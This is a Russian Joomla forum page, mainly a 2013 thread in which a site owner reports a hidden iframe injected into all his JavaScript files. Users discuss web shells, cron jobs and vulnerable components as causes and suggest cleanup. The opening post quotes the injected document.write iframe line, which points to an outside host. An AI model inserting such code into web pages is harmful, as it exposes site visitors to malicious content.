Новости Joomla

Вышли релизы безопасности Joomla 6.1.1 и Joomla 5.4.6

Релиз безопасности Joomla 6.1.1 и Joomla 5.4.6

Проект Joomla! рад сообщить о выходе Joomla 6.1.1 и Joomla 5.4.6. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 JoomShopping: Самый полный курс по созданию интернет-магазина на CMS Joomla.

👩‍💻 JoomShopping: Самый полный курс по созданию интернет-магазина на CMS Joomla.

В открытый доступ выложен видео-курс Дмитрия Гончарова по созданию интернет-магазина на связке Joomla + JoomShopping. Видеоуроки содержат пошаговые инструкции от регистрации хостинга до особенностей вёрстки, настройки способов оплаты и доставки.

В видео фигурирует JoomShopping 4 и Joomla 3, однако JoomShopping довольно консервативный компонент и многие способы и подходы в нём не менялись годами, поэтому данные видео могут быть по прежнему полезны.

Смотреть видео-курс

@joomlafeed

👩‍💻 SM WT CDEK аддон доставки для JoomShopping.

👩‍💻 SM WT CDEK аддон доставки для JoomShopping.

Способ доставки для интернет-магазина JoomShopping. Работает с API CDEK v.2. Считает стоимость доставки, позволяет выбрать пункт выдачи заказа CDEK на карте, отображает полную информацию о ПВЗ в заказе. Для работы аддона необходимо установить и настроить библиотеку WT CDEK.

👉 v.1.3.4. Что нового?
- Скидки на доставку. Добавлены настройки скидок на доставку в зависимости от суммы заказа. Также можно выбрать какую цену использовать: до применения купона или после.
- Фиксированная наценка. Добавлено поле для фиксированной наценки на доставку в интерфейс цены на доставку.
- Локализация. Сделаны файлы локализации. Русский и английский языки.
- Рефакторинг и чистка кода. Приблизили код к стандартам.

Страница расширения

@joomlafeed

1 2  Все   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 34 Ответов
  • 10775 Просмотров
*

andpuxa

  • Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
На сайте переодически появляется ссылкы
« : 19.02.2013, 22:43:13 »
Подскажите пожалуйста куда можно смотреть или как это исправить?
После выкладывания сайта в сеть на всех его страницах стали появляться ссылки такого вида:
Код
document.write('<iframe src="http://rnsxuud.mrslove.com/62e7c59045a9a74d.VaTbW9HdJ4g?default" name="Geranel" height="102" width="102" style="left:-500px;top:0px;position:fixed;"></iframe>');
Что самое плохое, это не статическая ссылка, которую можно удалить, а действительно динамическая. Ссылка появляется 3-5 раза в день (точно поймать не могу) на 10-60 минут и потом бесследно исчезает.
Прописывается она ВО всех js файлах, а после истечении определённого времени БЕССЛЕДНО исчезает опять же со всех js файлов. Проверка компьютера на вирусы, смена несколько раз пароля на ftp и не сохранения его в ftp-клиентах, установка самых мощных компонентов защиты (OSE и Marqo) не помогает. Как появлялась ссылка, так и пропадает, даже с большим цинизмом, так как прикрепляется к внутренним js файлам OSE.

Да, ссылка не постоянная, онапереодически меняется, т.е. нет статики.

очень прошу помочь, готов отблагодарить финансово! Помогите! ! ! !
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: На сайте переодически появляется ссылкы
« Ответ #1 : 19.02.2013, 23:26:27 »
А что в логах хостинга ?
Записан
*

diggs

  • Захожу иногда
  • 60
  • 4 / 0
Re: На сайте переодически появляется ссылкы
« Ответ #2 : 20.02.2013, 16:47:41 »
Столкнулся с такой же проблемой. Правда ссылка не исчезает. Но то, что на сайте вирусная активность не видит никто и ничто из анти вирусного ПО. Тело айфрейма почти одно и то же, ссылки у нас с вами разные.
Записан
*

diggs

  • Захожу иногда
  • 60
  • 4 / 0
Re: На сайте переодически появляется ссылкы
« Ответ #3 : 20.02.2013, 18:25:04 »
Хотя нет, в 15:02 залили ссылку, в 16:45 по логам удалили.
Записан
*

Pavel M

  • Захожу иногда
  • 103
  • 8 / 0
  • Учиться никогда не поздно
Re: На сайте переодически появляется ссылкы
« Ответ #4 : 20.02.2013, 18:35:08 »
Уже были похожие темы. Юзайте поиск: http://joomlaforum.ru/index.php/topic,246899.0.html

Скорее всего, взломали через JCE - он в эти пару месяцев наделал шуму уже.
Записан
*

diggs

  • Захожу иногда
  • 60
  • 4 / 0
Re: На сайте переодически появляется ссылкы
« Ответ #5 : 20.02.2013, 19:08:40 »
И тему эту видел и поиск юзал и этот пост читал в первую очередь.
JCE - у меня не стоит, так что предположение ошибочно.
Попробовал стереть все компы, модули и плагины от nonumber.nl, посмотрим как это поменяет ситуацию.
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: На сайте переодически появляется ссылкы
« Ответ #6 : 20.02.2013, 19:19:23 »
скарее всего автоматический скрипт гдето лежит, который работает с вашеми JS, а почему АВ не видет потомучто этих ссылок нет в его базе
Записан
*

diggs

  • Захожу иногда
  • 60
  • 4 / 0
Re: На сайте переодически появляется ссылкы
« Ответ #7 : 21.02.2013, 19:25:28 »
Так и есть, как можно вычислить его?
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: На сайте переодически появляется ссылкы
« Ответ #8 : 21.02.2013, 19:51:14 »
Цитата: diggs от 21.02.2013, 19:25:28
Так и есть, как можно вычислить его?
Посмотреть что запускается cron , если есть доступ.
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: На сайте переодически появляется ссылкы
« Ответ #9 : 21.02.2013, 20:02:30 »
его не обезательно может запускать cron! может любой файл запускать в который он инклудиться или который на него ссылается!
Записан
*

andpuxa

  • Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
Re: На сайте переодически появляется ссылкы
« Ответ #10 : 21.02.2013, 20:27:50 »
В общем я сначала подумал на хостера, что это он или какой нерадивый сотрудник подрабатывает. Сегодня весь день с ними переписывался нашли 4 шела, почистили, восстановили сайты, заново почистили и проверили. Шелов больше нет, но ссылки как шли так и остались. Причём, насколько я понял, показываются они всего несколько раз для одного IP и ссылки прописываюся на время... Т.е. помимо того, что ссылки прописываюся временно, так они ещё и подгружаются не всегда и не всем. Абсолютно гениальнейший человек написал (хоть и нехороший человек), - учёл все претензии поисковиков, такие ссылки и сайты поисковики не забанят.
Бороться с ними я так и не понял как... У меня на хостинге 8 сайтов, так эти ссылки вещаются везде... При переносе одного из них на другой хостинг, ссылки с него не идут... Видимо вот так и буду бороться удалив все сайты, а потом анализирую каждый. Что совсем плохо, так это то, что на все сайты с момента создания ставился OSE Antihacker и Marco SQL, логи мне приходили, но это видимо было вторжение сверх этих защит...
Моя вера в человечество разрушена  >:(
Записан
*

diggs

  • Захожу иногда
  • 60
  • 4 / 0
Re: На сайте переодически появляется ссылкы
« Ответ #11 : 21.02.2013, 20:47:36 »
Где у вас шелы нашли не сказали? Мне бы было интересно посмотреть на своих.
Записан
*

andpuxa

  • Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
Re: На сайте переодически появляется ссылкы
« Ответ #12 : 21.02.2013, 21:05:22 »
Цитата: diggs от 21.02.2013, 20:47:36
Где у вас шелы нашли не сказали? Мне бы было интересно посмотреть на своих.
Все в tmp
Записан
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Re: На сайте переодически появляется ссылкы
« Ответ #13 : 21.02.2013, 21:52:15 »
Цитата: diggs от 20.02.2013, 18:25:04
в 15:02 залили ссылку, в 16:45 по логам удалили.
А логи этого действа (залили/удалили) увидеть можно?
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: На сайте переодически появляется ссылкы
« Ответ #14 : 21.02.2013, 22:13:41 »
Цитата: flynstrool от 21.02.2013, 20:02:30
его не обезательно может запускать cron! может любой файл запускать в который он инклудиться или который на него ссылается!
И как интересно, если наверняка время жизни процесса не больше 60сек.
Записан
*

andpuxa

  • Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
Re: На сайте переодически появляется ссылкы
« Ответ #15 : 21.02.2013, 22:17:45 »
Кстати да, логи было бы интересно посмотреть.
Вот мои логи по всем сайтам:
Спойлер
[свернуть]
« Последнее редактирование: 21.02.2013, 22:31:08 от andpuxa »
Записан
*

andpuxa

  • Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
Re: На сайте переодически появляется ссылкы
« Ответ #16 : 21.02.2013, 22:19:54 »
Цитата: draff от 21.02.2013, 22:13:41
И как интересно, если наверняка время жизни процесса не больше 60сек.
У меня cron чистый, точнее он не содержит более ничего, кроме моей собственной строки, которую я вносил очень давно...
Записан
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Re: На сайте переодически появляется ссылкы
« Ответ #17 : 22.02.2013, 05:05:32 »
Цитата: draff от 21.02.2013, 22:13:41
И как интересно, если наверняка время жизни процесса не больше 60сек.
Довольно просто. Вражеский файл инклудится, например, в index.php шаблона (или в корневой индекс) и вызывается при каждой загрузке каждой страницы. Внутри файла проверяется условие (например, текущее время больше х и меньше у) и в заданный промежуток времени выводится нужный iframe. Разумеется, возможна куча вариантов.
« Последнее редактирование: 22.02.2013, 05:12:16 от WebDisaster »
Записан
*

andpuxa

  • Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
Re: На сайте переодически появляется ссылкы
« Ответ #18 : 22.02.2013, 09:21:54 »
Что самое интересное, на некоторых сайта (в разных папках) обноружил файлик time.txt с разным значением, где то 600, где то 30000. Сейчас выкачиваю все сайты и запущу поиск кто на него ссылается и кто его ещё содержит...
Файлик прикрепил, но там ничего особенного...

[вложение удалено Администратором]
« Последнее редактирование: 22.02.2013, 10:38:19 от andpuxa »
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: На сайте переодически появляется ссылкы
« Ответ #19 : 22.02.2013, 10:11:30 »
Цитата: WebDisaster от 22.02.2013, 05:05:32
Довольно просто.
Ты о запуске процесса при вызове скрипта, а не о автоматическом запуске  скрипта прописанного в движок сайта.
Конечно скрипт вызывается при наступлении какого то события.
Записан
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Re: На сайте переодически появляется ссылкы
« Ответ #20 : 22.02.2013, 15:48:19 »
draff, я писал о том, что видимый эффект, идентичный описанному топикстартером, можно получить без cron'a: ссылка будет появляться на страницах и исчезать в заданное время, при этом в crontab будет чисто.
Записан
*

NightGuard

  • Живу я здесь
  • 2927
  • 378 / 7
  • вжжж-вжжж
Re: На сайте переодически появляется ссылкы
« Ответ #21 : 22.02.2013, 16:24:33 »
Никто не учитывает, что могли залить файла, крон может работать вообще на другом серваке, обращаться к вашему сайту, добавляя к адресу переменные по которым скрипт определяет что ему делать - добавлять или удалять iframe.
Записан
Идеология сверхпотребления более опасна для человечества, чем идеология гитлеровского тоталитаризма
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: На сайте переодически появляется ссылкы
« Ответ #22 : 22.02.2013, 17:59:33 »
Цитата: draff от 21.02.2013, 22:13:41
И как интересно, если наверняка время жизни процесса не больше 60сек.
Ну к примеру скрипт изначально прописан в одном файле, есть трафик, т.е человек заядящий на сайт автаматически актевирует скрипт, скрипт выполняет поставленую ему задачу->прописывает себя в другой файл->чистит себя в старом файле->чистит логи! а тут и цикл на каждый уник!
Записан
*

andpuxa

  • Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
Re: На сайте переодически появляется ссылкы
« Ответ #23 : 22.02.2013, 18:59:46 »
После переноса 2 сайтов на другой хостинг простановка ссылок прекратилась, по крайней мере сегодня... Причём, как на перенесённых так и на оставшихся. Переносил вместе с переписыванием ты доменов, т.е. фактически полностью.
Да, ещё удалил пустые файлы от временных сайтов...
В общем, буду наблюдать...
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: На сайте переодически появляется ссылкы
« Ответ #24 : 22.02.2013, 19:58:30 »
Шаблон, случайно, не от Yootheme?
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: На сайте переодически появляется ссылкы
« Ответ #25 : 22.02.2013, 21:26:05 »
Вообще, может быть 1000 и 1 причина, почему это происходит. Объяснение одно - сайт хакнули. Вам следует, лучше всего, восстановить бэкап и следовать рекомендациям безопасности - никаких левых и малоизвестных компонентов, четкие права на папки и файлы - 755 и 644 на shared хостинге. В 99% сайт будет жить вечно. Почитайте здесь, если нет бэкапа.
http://www.exadomain.com/joomla-tutorials-and-guides/joomla-cms/48-joomla-iframe-hack-solution

Хакеры не глупые люди, но против них работают более умные люди над ядром Joomla. Порча сайта не обязательно вирус. Антивирус тут не при чем. Вы могли установить левый компонент или шаблон, а дальше зараза уже сама по своим алгоритмам начинает прописываться куда-хочет и делать, что хочет. Искать ее среди тысяч файлов - бессмыленно. Проще выжечь огнем все, восстановив бэкап.
« Последнее редактирование: 22.02.2013, 21:37:20 от capricorn »
Записан
*

andpuxa

  • Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
Re: На сайте переодически появляется ссылкы
« Ответ #26 : 23.02.2013, 11:47:39 »
На некоторых сайтах купленные шаблоны yootheme. А какую это играет роль?
Права на всех папках 755, на файлах 644, на configuration 444.
Правильно ли я понимаю, что если скрипт запуска ссылок на сайте, то он по любому будет запускаться, даже если сайт я перенесу на другой хостинг (с тем же доменом). Просто после переноса уже 3 сайтов на другой хостинг как на них, так и на оставшихся скрипт не запускается, т.е. ссылки не проставляются... Получается проблема устранена...
Я правда удалил ещё кучу оставшихся от некоторых доменов папок с папками log и tmp, но не могли же они распространять ссылки...
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: На сайте переодически появляется ссылкы
« Ответ #27 : 23.02.2013, 13:35:15 »
Цитата: andpuxa от 23.02.2013, 11:47:39
На некоторых сайтах купленные шаблоны yootheme. А какую это играет роль?
Права на всех папках 755, на файлах 644, на configuration 444.
Правильно ли я понимаю, что если скрипт запуска ссылок на сайте, то он по любому будет запускаться, даже если сайт я перенесу на другой хостинг (с тем же доменом). Просто после переноса уже 3 сайтов на другой хостинг как на них, так и на оставшихся скрипт не запускается, т.е. ссылки не проставляются... Получается проблема устранена...
Я правда удалил ещё кучу оставшихся от некоторых доменов папок с папками log и tmp, но не могли же они распространять ссылки...

Ждите когда хозяин этих ссылок заметит перенос сайта с одного хостинга на другой, т.е "отсутствие работоспособности его скриптов" и вновь полезит к вам через (если ставил минишелл) минишелл или вновь крутить уязвимый компонент... прежде чем выбирать хостера смотрите его на реверс, я бы сказал 50% хостеров под этой уязвимостью... а в дальнейшем обновите все свои компоненты, потому, что в основном, взлом Joomla происходит именно через КомпонентЫ!
Записан
*

andpuxa

  • Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
Re: На сайте переодически появляется ссылкы
« Ответ #28 : 23.02.2013, 22:10:31 »
Но по сути, сайты как раз не пропадают. Я их переношу не просто на тестовый домен, а переношу с теми доменами под которыми сайт работал. по сути скрипт же должен продолжать выполняться...
А где можно получить полноценный реверс хостинга?
Записан
*

andpuxa

  • Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
Re: На сайте переодически появляется ссылкы
« Ответ #29 : 24.02.2013, 12:02:34 »
Пока проблема не устранена, видимо была какая то передышка... Причём на перенесённых ссылок нет...
Записан
1 2  Все   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

 Ответов: 110
Просмотров: 78337 		Последний ответ 30.08.2023, 12:53:33
от SeBun
Re: Кажется вирус на сайте

Автор motokraft

 Ответов: 24
Просмотров: 6039 		Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
В файле index.php постоянно появляется вредоносный код

Автор Armal

 Ответов: 29
Просмотров: 5293 		Последний ответ 08.05.2021, 16:16:32
от gartes
На сайте появился вирус

Автор Lifar

 Ответов: 3
Просмотров: 1746 		Последний ответ 23.04.2021, 10:12:05
от ProtectYourSite
Регистрируются боты на сайте непрерывно.

Автор Stich SPb

 Ответов: 27
Просмотров: 14835 		Последний ответ 22.02.2021, 17:42:48
от soty20